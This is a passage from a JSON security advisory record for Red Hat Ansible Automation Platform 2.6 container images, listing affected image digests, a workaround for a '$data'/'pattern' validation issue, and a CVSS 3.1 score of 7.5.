"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
